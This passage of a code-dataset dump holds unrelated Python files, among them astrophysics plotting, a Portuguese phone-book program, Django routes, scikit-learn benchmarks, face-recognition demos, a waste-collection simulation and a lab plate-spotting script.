\n %s / Poor WSGI for Python , webmaster: %s \n \n \"\"\") % (uni(shandlers_html),\n uni(rhandlers_html),\n uni(dhandlers_html),\n uni(ehandlers_html),\n uni(pre_post_html),\n filters_html, # some variable are unicode yet\n headers_html,\n poor_html,\n app_html,\n environ_html,\n uni(req.server_software),\n uni(req.server_admin))\n\n req.content_type = \"text/html\"\n req.write(content_html)\n return DONE\n# enddef\n\n\ndef __fill_default_shandlers(code, handler):\n default_shandlers[code] = {}\n for m in methods.values():\n default_shandlers[code][m] = handler\n\n\n__fill_default_shandlers(HTTP_NOT_MODIFIED, not_modified)\n__fill_default_shandlers(HTTP_BAD_REQUEST, bad_request)\n__fill_default_shandlers(HTTP_FORBIDDEN, forbidden)\n__fill_default_shandlers(HTTP_NOT_FOUND, not_found)\n__fill_default_shandlers(HTTP_METHOD_NOT_ALLOWED, method_not_allowed)\n__fill_default_shandlers(HTTP_INTERNAL_SERVER_ERROR, internal_server_error)\n__fill_default_shandlers(HTTP_NOT_IMPLEMENTED, not_implemented)\n","sub_path":"poorwsgi/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":23966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"266628532","text":"\"\"\"\nMakes a histogram of the gas particle max temperature. Uses the swiftsimio library.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom swiftsimio import load\n\nfrom unyt import unyt_quantity\nfrom matplotlib.colors import LogNorm\nfrom matplotlib.animation import FuncAnimation\n\nT_bounds = [1e5, 3e10]\n\n\ndef get_data(filename):\n \"\"\"\n Grabs the data\n \"\"\"\n\n data = load(filename)\n\n gas_max_T = data.gas.maximal_temperatures.to(\"K\")\n\n return gas_max_T\n\n\ndef make_single_image(filenames, names, T_bounds, number_of_simulations, output_path):\n \"\"\"\n Makes a single histogram of the gas particle max temperatures.\n \"\"\"\n\n fig, ax = plt.subplots()\n\n ax.set_xlabel(\"Gas Max. Temperature $T_{\\\\rm max}$ [K]\")\n ax.set_ylabel(\"PDF [-]\")\n ax.loglog()\n\n for filename, name in zip(filenames, names):\n T_max = get_data(filename)\n h, bin_edges = np.histogram(\n np.log10(T_max), range=np.log10(T_bounds), bins=250, density=True\n )\n bins = 0.5 * (bin_edges[1:] + bin_edges[:-1])\n bins = 10 ** bins\n ax.plot(bins, h, label=name)\n\n ax.legend()\n ax.set_xlim(*T_bounds)\n\n fig.savefig(f\"{output_path}/gas_max_temperatures.png\")\n\n return\n\n\nif __name__ == \"__main__\":\n from swiftpipeline.argumentparser import ScriptArgumentParser\n\n arguments = ScriptArgumentParser(\n description=\"Basic gas particle max temperature histogram.\"\n )\n\n snapshot_filenames = [\n f\"{directory}/{snapshot}\"\n for directory, snapshot in zip(\n arguments.directory_list, arguments.snapshot_list\n )\n ]\n\n plt.style.use(arguments.stylesheet_location)\n\n make_single_image(\n filenames=snapshot_filenames,\n names=arguments.name_list,\n T_bounds=T_bounds,\n number_of_simulations=arguments.number_of_inputs,\n output_path=arguments.output_directory,\n )\n","sub_path":"eagle-xl/scripts/max_temperatures.py","file_name":"max_temperatures.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"571344181","text":"from sys import exit\nimport string\n\n# menu\ndef menu(lt_dict):\n print(\"\\n =========== LISTA TELEFONICA ===========\")\n print(\" = 1 - Ver lista =\")\n print(\" = 2 - Adicionar contato =\")\n print(\" = 3 - Excluir contato =\")\n print(\" = 4 - Excluir lista =\")\n print(\" = 5 - Sair =\")\n print(f\" {40*'='}\")\n\n while True:\n try:\n escolha = int(input(\" > \"))\n if 0 < escolha < 6:\n break\n else:\n print(\"\\n # Opcao invalida #\")\n except ValueError:\n print(\"\\n # Digite um valor valido #\")\n \n if escolha == 1:\n ver_lista(lt_dict)\n elif escolha == 2:\n add_contato(lt_dict)\n elif escolha == 3:\n del_contato(lt_dict)\n elif escolha == 4:\n del_lista(lt_dict)\n elif escolha == 5:\n print(\"\\n === Finalizando o programa ===\\n\")\n exit(0)\n \n# inicialização\ndef inicializar():\n try:\n arquivo = open(\"Lista telefonica.txt\", \"a\")\n arquivo.close()\n except:\n print(\" # Erro ao abrir lista telefonica #\")\n \n try:\n arquivo = open(\"Lista telefonica.txt\", \"r\")\n lt_list = list(arquivo)\n arquivo.close()\n except:\n print(\" # Erro ao ler lista telefonica #\")\n exit()\n \n lt_dict = {}\n contato = {}\n chaves = list(string.ascii_uppercase)\n for chave in chaves:\n lt_dict[chave] = []\n for linha in lt_list:\n if linha[0].upper() == chave:\n linha = linha.strip('\\n').split(',')\n contato['Nome'] = linha[0]\n contato['Numero'] = linha[1]\n lt_dict[chave].append(contato.copy()) \n return lt_dict\n\n# visualizar lista telefonica\ndef ver_lista(lt_dict):\n print(\" =============== CONTATOS ===============\")\n filtro = str(input(\" > Digite uma letra de A a Z para filtrar, ou '-' para mostrar todos. > \"))\n filtro = filtro.upper()\n if filtro == '-':\n for chave in lt_dict:\n print(f\"\\n - {chave} -\\n\")\n for contato in lt_dict[chave]:\n print(f\" Nome: {contato['Nome']} | Numero: {contato['Numero']}\")\n print(f\"\\n {40*'='}\\n\")\n elif filtro in lt_dict.keys():\n print(f\"\\n - {filtro} -\\n\")\n for contato in lt_dict[filtro]:\n print(f\" Nome: {contato['Nome']} | Numero: {contato['Numero']}\")\n else:\n print(\"\\n # Entrada invalida #\\n\")\n menu(lt_dict)\n\n# adicionar contato na lista telefonica\ndef add_contato(lt_dict):\n print(\" =========== ADICIONAR CONTATO ==========\")\n while True:\n nome = str(input(\" - Digite um nome valido: \"))\n if nome != '':\n if nome[0].upper() in lt_dict.keys():\n break\n \n while True:\n try:\n numero = str(input(\" - Digite um numero valido (somente numeros): \"))\n if len(numero) >= 8:\n if int(numero):\n break\n else:\n print(\"\\n # O numero deve conter no minimo 8 digitos #\")\n except ValueError:\n print(\"\\n # Numero invalido #\")\n \n if {'Nome': nome, 'Numero': numero} in lt_dict[nome[0].upper()]:\n print(\"\\n # Contato ja esta salvo na lista! #\")\n else:\n try:\n lt_dict[nome[0].upper()].append({'Nome': nome, 'Numero': numero})\n arquivo = open(\"Lista telefonica.txt\", \"a\")\n arquivo.write(f\"{nome},{numero}\\n\")\n arquivo.close()\n print(\"\\n - Contato salvo com sucesso!\\n\")\n except:\n print(\"\\n # Erro ao adicionar contato #\\n\")\n menu(lt_dict)\n\n# deletar contato da lista telefonica\ndef del_contato(lt_dict):\n nome = str(input(\" - Digite o nome do contato para a exclusão: \"))\n if nome != '':\n if nome[0].upper() in lt_dict.keys():\n numero = str(input(\" - Digite o numero do contato para a exclusão: \"))\n if {'Nome': nome, 'Numero': numero} in lt_dict[nome[0].upper()]:\n try:\n lt_dict[nome[0].upper()].remove({'Nome': nome, 'Numero': numero})\n arquivo = open(\"Lista telefonica.txt\", \"w\")\n for lista in lt_dict.values():\n for contato in lista:\n if contato['Nome'] != nome and contato['Numero'] != numero:\n arquivo.write(contato['Nome'] + \",\" + contato['Numero'] + \"\\n\")\n arquivo.close()\n print(\"\\n - Contato excluido com sucesso!\\n\")\n except:\n print(\"\\n # Erro ao excluir contato #\\n\")\n else:\n print(\"\\n # Este contato nao existe na agenda #\\n\")\n else:\n print(\"\\n # Nome invalido #\\n\")\n else:\n print(\"\\n # Erro ao excluir contato #\\n\")\n menu(lt_dict)\n \n# deletar lista telefonica\ndef del_lista(lt_dict):\n try:\n arquivo = open(\"Lista telefonica.txt\", \"w\")\n arquivo.close()\n chaves = list(string.ascii_uppercase)\n for chave in chaves:\n lt_dict[chave] = []\n print(\"\\n - Lista excluída com sucesso!\\n\")\n except:\n print(\"\\n # Falha ao excluir lista telefonica #\")\n menu(lt_dict)\n\n# main\nlista_telefonica = inicializar()\nmenu(lista_telefonica)\n","sub_path":"Codando em Python/Lista telefonica tilizando dicionario/main_lista_telefonica.py","file_name":"main_lista_telefonica.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"552916166","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom scipy.optimize import curve_fit\r\nfrom pylab import figure, axes, pie, title, show\r\n \r\n \r\n \r\nx, y = np.loadtxt('zaehlrate_weglaenge.txt', unpack=True,delimiter=',')\r\ne, g = np.loadtxt('regression1.txt', unpack=True,delimiter=',')\r\n \r\nplt.axhline(y=80.938, color='r', linestyle='dashed')\r\n\r\ndef f(e,a,b):\r\n return a*e+b\r\npopt, pcov = curve_fit(f, e, g)\r\nerrors = np.sqrt(np.diag(pcov))\r\n \r\nprint('a =', popt[0], '±', errors[0])\r\nprint('b =', popt[1], '±', errors[1])\r\ne_new = np.linspace(12.5, 16, 4) \r\n \r\nplt.figure(1)\r\nplt.plot(x,y,'x', label ='Messwerte')\r\nplt.plot(e_new, f(e_new,*popt),'-', label='Linearer Fit')\r\n \r\n \r\n \r\nplt.ylabel(r'$Zählrate/\\,10^{3}$')\r\nplt.xlabel(r'$x_0 \\, / \\,mm$')\r\nplt.grid()\r\nplt.legend()\r\n \r\n \r\n \r\n \r\nplt.savefig('zaehlrate_weglaenge.pdf')\r\nprint ('Fertig')","sub_path":"Evelyns Dateien/Grundpraktikum 2/V701/zaehlrate_weglaenge.py","file_name":"zaehlrate_weglaenge.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"460736725","text":"from django.conf.urls import url\nfrom django.contrib.auth.views import logout\nfrom . import views\n\napp_name = 'courses'\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^login/$', views.LoginView.as_view(), name='login'),\n url(r'^logout/$', logout, name='logout'),\n url(r'^student/(?P[\\w.@+-])+', views.student_profile, name='student_profile'),\n url(r'^professor/select', views.SelectCoursesView.as_view(), name='select_courses'),\n url(r'^professor/put-marks', views.PutMarksView.as_view(), name='put_marks'),\n url(r'^professor/(?P[\\w.@+-])+', views.professor_profile, name='professor_profile'),\n]\n","sub_path":"courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"527781264","text":"import sys\nreader = (s.rstrip() for s in sys.stdin)\ninput = reader.__next__\n\ndef gift():\n for _ in range(t):\n n,s = list(map(int,input().split()))\n *a, = list(map(int,input().split()))\n res = 0\n ma = 0\n max_ind = 1\n for i in range(n):\n cur = a[i]\n if cur > ma:\n ma = cur\n max_ind = i + 1\n if res + cur > s:\n yield max_ind\n break\n res += cur\n else:\n yield 0\nif __name__ == '__main__':\n t= int(input())\n ans = gift()\n print(*ans,sep='\\n')\n \n\n\n#\"{} {} {}\".format(maxele,minele,minele)\n\n# yield \" \".join([str(x) for x in ans])\n","sub_path":"yield generator例子.py","file_name":"yield generator例子.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"81866165","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Benchmarking all in scikit-learn\n#\n# Author: Pierre Glaser\nfrom benchmarks.common import SklearnBenchmark\nfrom benchmarks.common import ALL_REGRESSORS\nfrom benchmarks.common import clone_and_fit\n\nfrom benchmarks.config import N_SAMPLES\n\n\nclass RegressionBench(SklearnBenchmark):\n param_names = ['estimator_name', 'backend', 'pickler', 'n_jobs',\n 'n_samples', 'n_features']\n params = (sorted(list(ALL_REGRESSORS.keys()))[:5],\n ['multiprocessing', 'loky', 'threading'][1:],\n ['pickle', 'cloudpickle'],\n [1, 2, 4],\n ['auto'],\n ['auto'])\n\n def setup(self, estimator_name, backend, pickler, n_jobs, n_samples,\n n_features):\n super(RegressionBench, self).setup(backend, pickler)\n from sklearn.datasets import make_regression\n\n if n_samples == 'auto':\n n_samples = N_SAMPLES[estimator_name]\n\n if n_features == 'auto':\n n_features = 10\n\n # For multitask estimators, generate multi-dimensional output\n if 'MultiTask' in estimator_name:\n X, y = make_regression(n_samples, n_features, n_targets=4)\n else:\n X, y = make_regression(n_samples, n_features, n_targets=1)\n\n X, y = make_regression(n_samples, n_features)\n self.X = X\n assert self.X.shape[0] == N_SAMPLES[estimator_name]\n self.y = y\n\n def time_single_fit_parallelization(self, estimator_name, backend, pickler,\n n_jobs, n_samples, n_features):\n # ALL_REGRESSORS is a dict. The keys are the estimator class names, and\n # the values are the estimator classes\n cls = ALL_REGRESSORS[estimator_name]\n estimator = cls()\n if 'n_jobs' in estimator.get_params():\n estimator.set_params(n_jobs=n_jobs)\n else:\n print('warning: n_jobs is not an attribute of {}'.format(\n estimator))\n\n from joblib import parallel_backend\n with parallel_backend(backend):\n estimator.fit(self.X, self.y)\n\n def time_multiple_fit_parallelization(self, estimator_name, backend,\n pickler, n_jobs, n_samples,\n n_features):\n cls = ALL_REGRESSORS[estimator_name]\n estimator = cls()\n from joblib import Parallel, delayed\n if 'n_jobs' in estimator.get_params():\n # avoid over subscription\n estimator.set_params(n_jobs=1)\n\n Parallel(backend=backend, n_jobs=n_jobs)(delayed(clone_and_fit)(\n estimator, self.X, self.y) for _ in range(self.n_tasks))\n","sub_path":"benchmarks/bench_all_estimators.py","file_name":"bench_all_estimators.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"284301528","text":"# coding: utf-8\nimport face_recognition\nimport cv2\nimport dlib\n\n\ndef a():\n image = face_recognition.load_image_file(\"my_picture.jpg\")\n face_locations = face_recognition.face_locations(image, model='cnn')\n print(face_locations)\n\n\ndef b():\n # Load the jpg files into numpy arrays\n biden_image = face_recognition.load_image_file(\"biden.jpg\")\n obama_image = face_recognition.load_image_file(\"obama.jpg\")\n unknown_image = face_recognition.load_image_file(\"obama2.jpg\")\n\n # Get the face encodings for each face in each image file\n # Since there could be more than one face in each image, it returns a list of encodings.\n # But since I know each image only has one face, I only care about the first encoding in each image, so I grab index 0.\n try:\n biden_face_encoding = face_recognition.face_encodings(biden_image)[0]\n obama_face_encoding = face_recognition.face_encodings(obama_image)[0]\n unknown_face_encoding = face_recognition.face_encodings(unknown_image)[0]\n except IndexError:\n print(\"I wasn't able to locate any faces in at least one of the images. Check the image files. Aborting...\")\n quit()\n\n known_faces = [biden_face_encoding, obama_face_encoding]\n\n # results is an array of True/False telling if the unknown face matched anyone in the known_faces array\n results = face_recognition.compare_faces(known_faces, unknown_face_encoding)\n\n print(\"Is the unknown face a picture of Biden? {}\".format(results[0]))\n print(\"Is the unknown face a picture of Obama? {}\".format(results[1]))\n print(\"Is the unknown face a new person that we've never seen before? {}\".format(not True in results))\n\n\ndef c():\n # 输入已知图片biden.jpg\n known_image = face_recognition.load_image_file(\"biden.jpg\")\n # 输入待识别的图片unknown.jpg\n unknown_image = face_recognition.load_image_file(\"unknown.jpg\")\n\n biden_encoding = face_recognition.face_encodings(known_image)[0]\n unknown_encoding = face_recognition.face_encodings(unknown_image)[0]\n\n results = face_recognition.compare_faces([biden_encoding], unknown_encoding)\n # 输出的results是一串Boolean值\n print(results)\n\n\ndef d():\n path = \"unknown.jpg\"\n img = cv2.imread(path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # 人脸分类器\n detector = dlib.get_frontal_face_detector()\n # 获取人脸检测器\n predictor = dlib.shape_predictor(\n r\"E:\\work\\ml\\venv\\Lib\\site-packages\\face_recognition_models\\models\\shape_predictor_68_face_landmarks.dat\")\n\n dets = detector(gray, 1)\n for face in dets:\n shape = predictor(img, face) # 寻找人脸的68个标定点\n # 遍历所有点,打印出其坐标,并圈出来\n for pt in shape.parts():\n pt_pos = (pt.x, pt.y)\n cv2.circle(img, pt_pos, 2, (0, 255, 0), 1)\n cv2.imshow(\"image\", img)\n\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n d()\n","sub_path":"demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466491227","text":"class bandit:\n def __init__(self, mu=0.5, sigma=0.2, name='K'):\n self.name = name\n self.mu = mu\n self.sigma = sigma\n self.cumm_reward = [0]\n self.Q_val = [0]\n self.itr = [0]\n def lever_pull(self):\n import random\n return (random.gauss(self.mu,self.sigma))\n def get_imm_reward(self):\n return self.cumm_reward\n def update(self,q,r,i):\n if q == None:\n self.Q_val.append(self.Q_val[i-1])\n else:\n self.Q_val.append(q)\n self.cumm_reward.append(self.cumm_reward[i-1]+r)\n self.itr.append(i)\n def plotter(self):\n from matplotlib import pyplot as p\n p.plot(self.itr,self.Q_val)\n p.title(str(self.name)+' optimum action transition')\n p.show()\n return (self.cumm_reward[-1])\n","sub_path":"experiment/Bandit_exp.py","file_name":"Bandit_exp.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502682518","text":"'''\nLibraries Used for the project\n'''\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\nimport math\n\n\ndef scenario_main(residents, trash_bin_size, mc_stimulation, collections):\n '''\n For this mc stimulation we are using fixed residents in the complex \"250\" along with that the trash bin size is 4 cubic yards.\n This will also ask for the input for number of collections\n :return:This will return the stimulations, number of residents, trash bin size and the number of collections each week\n >>>scenario_main(250, 4, 1000, 7)\n Not a viable scenario\n '''\n if collections == 1:\n bins = 11\n stimulate(mc_stimulation, bins, trash_bin_size, residents, collections)\n\n elif collections == 2:\n bins = 6\n stimulate(mc_stimulation, bins, trash_bin_size, residents, collections)\n\n elif collections > 2:\n print(\"Not a viable scenario\")\n\n\ndef triangular(no_of_residents):\n '''\n This will generate the amount of trash produced by a person through triangular distribution and produce the total trash for total number of residents weekly\n :param no_of_residents: The total number of residents in an apartment complex\n :return:The amount of trash produced weekly by all residents\n >>>triangular(250)\n >>>if complete_trash >= 42 and complete_trash <= 53\n ...print(True)\n >>>else:\n ...print(False)\n True\n '''\n wt=175\n triangular_values=list(np.random.triangular(1.5, 4.7, 8.1, no_of_residents))\n trash_residents= [x / wt for x in triangular_values]\n trash_weekly= [x*7 for x in trash_residents]\n complete_trash=sum(trash_weekly)\n return(complete_trash)\n\n\ndef stimulate(N, No_bins, bin_size, persons, collect):\n '''\n This will apply the monte carlo stimulation. We check the number of collection over which we see how much trash is produced and create output for each simulation and a end result for all stimulations.\n :param N:Input the number of stimulations\n :param No_bins:Number of dustbins required in the apartment complex\n :param bin_size:The Dustbin size as required for the apartment complex\n :param persons:The number of residents in the apartment complex\n :param collect:Input of Number of weekly collections, 1 or 2\n :return:This will produce results for all the stimulations\n >>>\n '''\n output_data = []\n for i in range(N):\n per_stimulation = []\n total_trash = 0\n\n capacity = bin_size * No_bins\n\n if collect == 1:\n total_trash = triangular(persons)\n if collect == 2:\n total_trash = triangular(persons)\n total_trash = total_trash / 2\n\n per_stimulation.append(persons)\n per_stimulation.append(No_bins)\n per_stimulation.append(capacity)\n per_stimulation.append(total_trash)\n\n value = threshold(total_trash, capacity)\n\n if value[2] == 1:\n per_stimulation.append(value[0])\n per_stimulation.append(0)\n per_stimulation.append(\"No\")\n per_stimulation.append(value[1])\n\n\n elif value[2] == 2:\n per_stimulation.append(0)\n per_stimulation.append(value[0])\n per_stimulation.append(\"No\")\n per_stimulation.append(value[1])\n\n elif value[2] == 3:\n per_stimulation.append(0)\n per_stimulation.append(0)\n per_stimulation.append(value[0])\n per_stimulation.append(value[1])\n\n output_data.append(per_stimulation)\n\n conclusions(output_data)\n\n\ndef threshold(trash, cap):\n '''\n :param trash:Total trash produced by 250 residents in the apartment complex\n :param cap: Total capacity of all the trash bins available\n :return:This returns a list which contains the percentage and status of bin\n >>>threshold(48, 44)\n [9.091, 'Overfull', 2]\n '''\n if trash < cap:\n Underfull = 100 - (trash / cap * 100)\n Underfull = round(Underfull, 3)\n return ([Underfull, \"Underfull\", 1])\n\n elif trash > cap:\n overfull = (trash - cap) / cap * 100\n overfull = round(overfull, 3)\n return ([overfull, \"Overfull\", 2])\n\n elif int(trash) == cap:\n full = \"YES\"\n return ([full, \"Full\", 3])\n\n\ndef conclusions(data):\n '''\n This function generates visual reports and graphs to better understand the stimulation we ran for the given scenarios\n :param data:The compiled output generated after mc stimulation\n :return:Displays the Dataframe, report, The Positve and negative hrizontal bar chart, histogram and vertical bar chart\n '''\n final_data = pd.DataFrame(data)\n final_data = final_data.rename(\n columns={0: 'Number of Residents', 1: \"Number of Bins\", 2: \"Trash Capacity\", 3: \"Total Trash per week\",\n 4: \"Percent Empty\", 5: \"Percent Over Fill\", 6: \"Is Full?\", 7: \"Status of Bins\"})\n report = final_data.describe()\n display(final_data)\n display(report)\n\n final_data[\"Clean\"] = final_data[\"Status of Bins\"] == 'Underfull'\n values = []\n for i in range(len(final_data)):\n if final_data[\"Percent Empty\"][i] != 0.0:\n values.append(final_data[\"Percent Empty\"][i])\n elif final_data[\"Percent Over Fill\"][i] != 0.0:\n values.append(-(final_data[\"Percent Over Fill\"][i]))\n else:\n values.append(0)\n\n final_data[\"Percentage Clean\"] = values\n\n fig = plt.figure(figsize=(10, 18))\n final_data[\"Percentage Clean\"].plot(kind='barh', color=final_data.Clean.map({True: 'g', False: 'r'}))\n plt.title(\"The Percentage of Status and Cleanliness of the Bins\")\n plt.xlabel('Percentage Empty or Overfull')\n plt.ylabel('Number of Stimulations')\n plt.show()\n\n plt.hist(final_data[\"Total Trash per week\"], bins=\"auto\")\n plt.ylabel('Number of Bins')\n plt.xlabel('Status of Bins')\n plt.title(\"Histogram for Total Trash\")\n plt.show()\n\n final_data[\"Status of Bins\"].value_counts().plot(kind=\"bar\")\n plt.title(\"Number of Bins under each Status\")\n plt.show()\n\n\n\nif __name__ == '__main__':\n total_residents = 250\n trash_size = 4 # 4 cubic yard trash\n print('Number of residents in Apartment Complex: ', total_residents)\n stimulations = int(input('Number of MC stimulations:'))\n collect = int(input('Number of trash collection (suggestion 1 or 2):'))\n\n scenario_main(total_residents, trash_size, stimulations, collect)\n\n\n# View of triangular distributions as an example to illustrate how we are using it\ndef triangular_stimulations(no_of_residents):\n '''\n This function produces a histogram to show triangular distribution with similar scenarios used in our program above\n :param no_of_residents: This is the total number of residents in an apartment complex\n :return:This will return a Histogram\n '''\n plt.hist(np.random.triangular(1.5, 4.7, 8.1, no_of_residents), bins=200)\n plt.title(\"The Triangular Distribution Graph\")\n plt.show()\n\ntriangular_stimulations(20000)\n","sub_path":"Optimization of Resources for Waste Management.py","file_name":"Optimization of Resources for Waste Management.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"119002927","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 4 16:47:06 2018\r\n\r\n@author: Eamonn Kennedy & chrisarcadia\r\n\"\"\"\r\n\r\n\r\n# libraries\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport chemcpupy as ccpu\r\nimport os\r\nfrom copy import deepcopy\r\nfrom chemcpupy.tools.misc import *\r\nimport itertools\r\nimport scipy.io\r\n\r\n# Make Temporary Data Folder\r\ntemp_dir = '__temporary__';\r\nif not os.path.isdir(temp_dir):\r\n os.mkdir(temp_dir)\r\nnp.set_printoptions(threshold=50)\r\n\r\n# Parameters\r\npurified_products = [ 'C4','D6','D9','H6','H11','I8','I10' ] \r\nN = len(purified_products) # library size\r\nk = 3 # constant mixture size\r\n\r\n# ============================================================\r\n# ============================================================ \r\n# Load Ugi Library 3 plate\r\n\r\n# Load Lib from json (lazy loading of entire library as source plate for brevity)\r\nmylibjson='demos_and_data/bruker_run9_20180710/library_3_WellPlate384.json'\r\nlib_plate = ccpu.WellPlate384(mixture_json_file=mylibjson)\r\nlib_positions = bounds_to_positions( purified_products )\r\n \r\n# Specifying Matrix in Plate\r\nmatrix = ccpu.CompoundList(cid_list=[5328791,]); # Alpha-cyano-4-hydroxycinnamic acid # matrix solution made as: 10mg HCCA, 3.33mL DMSO, 0.9mg Mass Lock (Library 1 - F13)\r\nmatrix.auto_fill_properties_from_pubchem();\r\nmatrix_positions = bounds_to_positions( ['P1']);\r\nmatrix_spot_volume = 25; \r\nmatrix_spotting_desc = 'Matrix Spotting';\r\n#for pos in matrix_positions:\r\n# lib_plate.add_compounds_to_location(pos,\r\n# matrix,\r\n# volume=50e3)\r\n\r\n# Preview library\r\nprint('\\n\\nLibrary: Library 3 Plate')\r\n#lib_plate.graphical_print_by_mass()\r\nlib_plate.graphical_print_compounds_per_well()\r\n\r\n# ============================================================\r\n# ============================================================\r\n# CREATE A 1536 MIXTURE PLATE\r\nmixture_plate = ccpu.MaldiPlate1536(description='maldi_1536_plate')\r\n# CREATE A MIXTURE TASKLIST\r\ntl_mix = ccpu.TaskList(description='Create Mixtures')\r\n# LOAD IMAGE DATA\r\nx = scipy.io.loadmat('demos_and_data/bruker_run9_20180710/ibex.mat')\r\n# mydata = x['data'].astype('bool')\r\nmydata = x['ibex']\r\nxlen = len(mydata)\r\nylen = len(mydata.T)\r\n\r\n# SHOW THE ORIGINAL DATA\r\nprint('\\n\\nOriginal image:')\r\nplt.imshow(mydata)\r\nplt.show()\r\n\r\n# GENERATE KNOWN PERMUTATION\r\nperm,antiperm,permdata = make_permutation(mydata.reshape(-1),seed=999)\r\n\r\n# SHOW THE PERMUTED IMAGE\r\nprint('\\n\\nPermuted image:')\r\nplt.imshow(permdata.reshape(xlen,ylen))\r\nplt.show()\r\n\r\n# GENERATE A CODEBOOK TO THE BOOL MIXTURES\r\ncodebook = list(itertools.combinations(range(N),k)) # Note: this is not memory efficient\r\ncapacity = np.floor(np.log2(len(codebook)))\r\n\r\n# GROUP DATA INTO MIXTURES\r\nmyboolmixtures = separate_by_count(permdata,int(capacity))\r\nmixture_positions = mixture_plate.list_empty_positions()\r\n\r\n# APPLY A CODEBOOK TO THE BOOL MIXTURE AS A STRING\r\ncounter = 0\r\nthis_data = {}\r\ntarget_positions = [];\r\nfor mix_present,mix_pos in zip(myboolmixtures,mixture_positions):\r\n mix_string = np.array2string(mix_present,separator='')\r\n this_data[counter] = int(mix_string[1:-1],2)\r\n this_mixture = codebook[this_data[counter]]\r\n this_mix_pos = [lib_positions[x] for x in this_mixture]\r\n counter = counter + 1\r\n target_positions = target_positions + [mix_pos];\r\n task = ccpu.TransferTask(from_plate=lib_plate,\r\n from_positions=this_mix_pos,\r\n to_plate=mixture_plate,\r\n to_positions=mix_pos,\r\n transfer_volumes=10)\r\n \r\n tl_mix.add(task)\r\n \r\n# SPOT MATRIX\r\ntarget_positions = list(set(target_positions));\r\ntl_matrix = ccpu.TaskList(description=matrix_spotting_desc); \r\nfor pos in target_positions:\r\n task = ccpu.TransferTask(from_plate=lib_plate,\r\n from_positions=matrix_positions[0],\r\n to_plate=mixture_plate,\r\n to_positions=pos,\r\n transfer_volumes=[matrix_spot_volume], # nL\r\n transfer_group_label=matrix_spotting_desc.lower(),\r\n );\r\n tl_matrix.add(task) \r\n \r\n# Consolidate tasks for the plate\r\ntl_all = ccpu.TaskList(description='Final Plate'); \r\nlist_of_tasklists = [tl_mix, tl_matrix];\r\nfor tasklist in list_of_tasklists:\r\n tl_all.merge(tasklist);\r\n \r\n \r\n# CREATE MIXING TASKS\r\n# ------------------\r\n# run mixture generation\r\ntl_all.summarize()\r\ntl_all.run(verbose=False,\r\n volume_increment=2.5,\r\n enforce_volume_limits=False,\r\n robot='echo')\r\nccpu.Echo.write_Echo_csv_picklist(tl_all,'__temporary__/ibex_spotting.csv') # write Echo picklists\r\n\r\n# Preview the plates\r\nprint('\\n\\nDestination: Mixture Plate')\r\n#mixture_plate.graphical_print_by_mass()\r\nmixture_plate.graphical_print_compounds_per_well()\r\nprint('\\n\\nSource: Library 3 Plate')\r\nlib_plate.graphical_print_volumes(units='uL'); # check_library_volume\r\n\r\n# --------------------------------\r\n# READ DATA\r\n\r\n# return the image from 'experimental_products_present' exp_prod_present which has noise\r\nerror_lvl = 0.02\r\nread_permdata = \"\"\r\nfor spots in range(len(this_data)):\r\n if np.random.rand(1)>error_lvl:\r\n exp_prod_pres = codebook[(this_data[spots])] # true data\r\n else:\r\n exp_prod_pres = codebook[np.random.randint(len(codebook))] # corrupted data\r\n code_index = [i for i, x in enumerate(codebook) if x == exp_prod_pres]\r\n present_bool = np.binary_repr(codebook.index(exp_prod_pres),int(capacity))\r\n read_permdata+=present_bool\r\n \r\n# REVERSE PERMUTATION\r\nread_permdata = read_permdata[:len(permdata)]\r\nread_data = np.array([int(read_permdata[i]) for i in antiperm],dtype='bool').reshape(mydata.shape)\r\n\r\n# SHOW DECODED IMAGE\r\nprint('\\n\\nImage as decoded from the maldi plat with pseudo noise')\r\nplt.imshow(read_data*1)\r\nplt.show()\r\n\r\n","sub_path":"chemicalcpu/demos_and_data/bruker_run9_20180710/bruker_trip9.py","file_name":"bruker_trip9.py","file_ext":"py","file_size_in_byte":6002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621361458","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm #color maps\nimport matplotlib.animation as animation\nfrom matplotlib.animation import FFMpegWriter\n\nimport sys #this is for accessing command line input\n\nglobal Nt #number of time steps one rotation of the star is divided into\nglobal Nen #number of energy bands the spectrum is divided into\nglobal column1; global column2; global column3;\n\n'''\nOutput.dat contains 